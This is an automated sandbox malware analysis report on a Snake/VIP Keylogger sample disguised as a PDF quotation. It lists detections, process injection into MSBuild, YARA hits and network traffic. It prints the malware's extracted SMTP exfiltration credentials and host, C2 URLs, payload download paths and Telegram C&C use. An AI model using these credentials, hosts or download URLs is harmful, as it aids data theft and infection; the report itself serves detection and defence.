Edit tour

Windows Analysis Report
QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Overview

General Information

Sample name:	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe renamed because original name is a hash value
Original sample name:	QUOTATION_JULQTRA071244PDF.scr.exe
Analysis ID:	1483407
MD5:	2bbe097169a74646c685a1b024315626
SHA1:	7c7bfa5b44451bc39db388133377bcdce8fd1f65
SHA256:	f595c00fffb17fd458273a49b6378541d83d9a35a8d5fe4b2eaf8ccb9d204802
Tags:	exe
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: MSBuild connects to smtp port

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Modifies the context of a thread in another process (thread injection)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION_JULQTRA071244#U00b7PDF.scr.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe" MD5: 2BBE097169A74646C685A1B024315626)

cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7516 cmdline: timeout 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)

cmd.exe (PID: 7664 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7716 cmdline: timeout 10 MD5: 100065E21CFBBDE57CBA2838921F84D6)

MSBuild.exe (PID: 8188 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" MD5: 2EDD0B288FE2459DA84E4274D1942343)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sendoka@grupomss.com", "Password": "KART&&UK55@@!!", "Host": "investms.vadavo.cloud", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2344366923.0000013750870000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xce8e6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000002.2346839728.0000013750CE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8f9:$a1: get_encryptedPassword 0x2dc0e:$a2: get_encryptedUsername 0x2d709:$a3: get_timePasswordChanged 0x2d812:$a4: get_passwordField 0x2d90f:$a5: set_encryptedPassword 0x2ef8f:$a7: get_logins 0x2eef2:$a10: KeyLoggerEventArgs 0x2eb59:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x56419:$a1: get_encryptedPassword 0x5672e:$a2: get_encryptedUsername 0x56229:$a3: get_timePasswordChanged 0x56332:$a4: get_passwordField 0x5642f:$a5: set_encryptedPassword 0x57aaf:$a7: get_logins 0x57a12:$a10: KeyLoggerEventArgs 0x57679:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x216536:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf6149:$a1: get_encryptedPassword 0x138f81:$a1: get_encryptedPassword 0xf645e:$a2: get_encryptedUsername 0x139296:$a2: get_encryptedUsername 0xf5f59:$a3: get_timePasswordChanged 0x138d91:$a3: get_timePasswordChanged 0xf6062:$a4: get_passwordField 0x138e9a:$a4: get_passwordField 0xf615f:$a5: set_encryptedPassword 0x138f97:$a5: set_encryptedPassword 0xf77df:$a7: get_logins 0x13a617:$a7: get_logins 0xf7742:$a10: KeyLoggerEventArgs 0x13a57a:$a10: KeyLoggerEventArgs 0xf73a9:$a11: KeyLoggerEventArgsEventHandler 0x13a1e1:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe PID: 7404	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x598f3:$a1: get_encryptedPassword 0xc0220:$a1: get_encryptedPassword 0x59bfe:$a2: get_encryptedUsername 0xc0420:$a2: get_encryptedUsername 0x5970d:$a3: get_timePasswordChanged 0xc004d:$a3: get_timePasswordChanged 0x59816:$a4: get_passwordField 0xc014a:$a4: get_passwordField 0x59909:$a5: set_encryptedPassword 0xc0236:$a5: set_encryptedPassword 0x5bd80:$a7: get_logins 0xc2006:$a7: get_logins 0x5bce3:$a10: KeyLoggerEventArgs 0xc1f73:$a10: KeyLoggerEventArgs 0x5b94e:$a11: KeyLoggerEventArgsEventHandler 0xc1c9c:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: MSBuild.exe PID: 8188	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 8188	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 8188	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: MSBuild.exe PID: 8188	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x43a78:$a1: get_encryptedPassword 0x43d83:$a2: get_encryptedUsername 0x43892:$a3: get_timePasswordChanged 0x4399b:$a4: get_passwordField 0x43a8e:$a5: set_encryptedPassword 0x45f05:$a7: get_logins 0x45e68:$a10: KeyLoggerEventArgs 0x45ad3:$a11: KeyLoggerEventArgsEventHandler
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13750ce0000.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
10.2.MSBuild.exe.140000000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.MSBuild.exe.140000000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.MSBuild.exe.140000000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.MSBuild.exe.140000000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daf9:$a1: get_encryptedPassword 0x2de0e:$a2: get_encryptedUsername 0x2d909:$a3: get_timePasswordChanged 0x2da12:$a4: get_passwordField 0x2db0f:$a5: set_encryptedPassword 0x2f18f:$a7: get_logins 0x2f0f2:$a10: KeyLoggerEventArgs 0x2ed59:$a11: KeyLoggerEventArgsEventHandler
10.2.MSBuild.exe.140000000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b842:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3aee5:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b142:$a4: \Orbitum\User Data\Default\Login Data 0x3bb21:$a5: \Kometa\User Data\Default\Login Data
10.2.MSBuild.exe.140000000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e6f8:$s1: UnHook 0x2e6ff:$s2: SetHook 0x2e707:$s3: CallNextHook 0x2e714:$s4: _hook
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747c5c0a0.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x19c71e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7c331:$a1: get_encryptedPassword 0xbf169:$a1: get_encryptedPassword 0x7c646:$a2: get_encryptedUsername 0xbf47e:$a2: get_encryptedUsername 0x7c141:$a3: get_timePasswordChanged 0xbef79:$a3: get_timePasswordChanged 0x7c24a:$a4: get_passwordField 0xbf082:$a4: get_passwordField 0x7c347:$a5: set_encryptedPassword 0xbf17f:$a5: set_encryptedPassword 0x7d9c7:$a7: get_logins 0xc07ff:$a7: get_logins 0x7d92a:$a10: KeyLoggerEventArgs 0xc0762:$a10: KeyLoggerEventArgs 0x7d591:$a11: KeyLoggerEventArgsEventHandler 0xc03c9:$a11: KeyLoggerEventArgsEventHandler
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x7cf30:$s1: UnHook 0xbfd68:$s1: UnHook 0x7cf37:$s2: SetHook 0xbfd6f:$s2: SetHook 0x7cf3f:$s3: CallNextHook 0xbfd77:$s3: CallNextHook 0x7cf4c:$s4: _hook 0xbfd84:$s4: _hook
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21478e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf43a1:$a1: get_encryptedPassword 0x1371d9:$a1: get_encryptedPassword 0xf46b6:$a2: get_encryptedUsername 0x1374ee:$a2: get_encryptedUsername 0xf41b1:$a3: get_timePasswordChanged 0x136fe9:$a3: get_timePasswordChanged 0xf42ba:$a4: get_passwordField 0x1370f2:$a4: get_passwordField 0xf43b7:$a5: set_encryptedPassword 0x1371ef:$a5: set_encryptedPassword 0xf5a37:$a7: get_logins 0x13886f:$a7: get_logins 0xf599a:$a10: KeyLoggerEventArgs 0x1387d2:$a10: KeyLoggerEventArgs 0xf5601:$a11: KeyLoggerEventArgsEventHandler 0x138439:$a11: KeyLoggerEventArgsEventHandler
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1ec756:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xcc369:$a1: get_encryptedPassword 0x10f1a1:$a1: get_encryptedPassword 0xcc67e:$a2: get_encryptedUsername 0x10f4b6:$a2: get_encryptedUsername 0xcc179:$a3: get_timePasswordChanged 0x10efb1:$a3: get_timePasswordChanged 0xcc282:$a4: get_passwordField 0x10f0ba:$a4: get_passwordField 0xcc37f:$a5: set_encryptedPassword 0x10f1b7:$a5: set_encryptedPassword 0xcd9ff:$a7: get_logins 0x110837:$a7: get_logins 0xcd962:$a10: KeyLoggerEventArgs 0x11079a:$a10: KeyLoggerEventArgs 0xcd5c9:$a11: KeyLoggerEventArgsEventHandler 0x110401:$a11: KeyLoggerEventArgsEventHandler
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747d82da8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xf4fa0:$s1: UnHook 0x137dd8:$s1: UnHook 0xf4fa7:$s2: SetHook 0x137ddf:$s2: SetHook 0xf4faf:$s3: CallNextHook 0x137de7:$s3: CallNextHook 0xf4fbc:$s4: _hook 0x137df4:$s4: _hook
0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xccf68:$s1: UnHook 0x10fda0:$s1: UnHook 0xccf6f:$s2: SetHook 0x10fda7:$s2: SetHook 0xccf77:$s3: CallNextHook 0x10fdaf:$s3: CallNextHook 0xccf84:$s4: _hook 0x10fdbc:$s4: _hook
Click to see the 23 entries

Sigma Signatures

Networking

Sigma detected: MSBuild connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.123.204.162, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8188, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49758

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 8188, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49740

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T11:02:24.769287+0200
SID:	2803305
Source Port:	49752
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T11:02:22.215117+0200
SID:	2803305
Source Port:	49750
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-07-27T11:02:09.943016+0200
SID:	2803274
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T11:02:13.045103+0200
SID:	2803305
Source Port:	49742
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T11:01:56.627341+0200
SID:	2022930
Source Port:	443
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-07-27T11:02:14.364849+0200
SID:	2803274
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T11:01:18.959325+0200
SID:	2022930
Source Port:	443
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 132.226.8.169

Timestamp:	2024-07-27T11:02:12.427973+0200
SID:	2803274
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://anotherarmy.dns.army:8081

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendoka@grupomss.com", "Password": "KART&&UK55@@!!", "Host": "investms.vadavo.cloud", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: http://varders.kozow.com:8081	Virustotal: Detection: 14%	Perma Link
Source: http://aborters.duckdns.org:8081	Virustotal: Detection: 11%	Perma Link
Source: http://anotherarmy.dns.army:8081	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for submitted file

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Virustotal: Detection: 21%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49757 version: TLS 1.2

Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.00000137380C8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2347202995.0000013750D40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Code function: 4x nop then jmp 00007FFD9B980636h	0_2_00007FFD9B970472
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B88C7D5h	10_2_00007FFD9B88C3ED
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B88C1BBh	10_2_00007FFD9B88BF8F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B889B80h	10_2_00007FFD9B889B56
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B8889CDh	10_2_00007FFD9B8887E1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 00007FFD9B88C7D5h	10_2_00007FFD9B88C6F1

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747daade0.7.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49758 -> 185.123.204.162:587

Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/iiz1WoiTc5zb HTTP/1.1Host: s22.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
